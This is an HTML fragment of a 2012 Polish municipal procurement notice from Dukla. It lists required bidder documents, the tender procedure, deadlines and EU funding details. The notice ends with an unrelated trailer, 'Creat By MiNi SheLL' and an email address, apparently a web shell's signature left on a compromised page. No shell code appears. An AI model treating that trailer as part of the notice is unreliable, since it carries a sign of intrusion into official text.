<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	Oferta przetargowa wg Załącznika Nr 1 do SIWZ, 
b)	Oświadczenie o spełnieniu warunków  art. 22 ust. 1 i art. 24 ust. 1 pzp wg Załącznika Nr 2 do SIWZ   - Zał. Nr 1 do oferty.
c)	Oświadczenie o podwykonawcach, w przypadku braku podwykonawców w realizacji zadania również oświadczenie o braku podwykonawców (art.36 ust5 pzp ) wg Załącznika Nr 3 do SIWZ   - Zał. Nr 2  do oferty.
d)	Zaakceptowany i wypełniony przez wykonawcę projekt umowy wg Załącznika Nr 4 do SIWZ   - Zał. Nr 3 do oferty.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dukla.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Dukli, 38-450 Dukla, ul. Trakt Węgierski 11, pokój Nr 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.10.2012 godzina 08:00, miejsce: Urząd Miejski w Dukli, 38-450 Dukla, ul. Trakt Węgierski 11, pokój Nr 9.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> umowa o dofinansowanie Projekt : Indywidualizacja = edukacja w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego ze środków Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com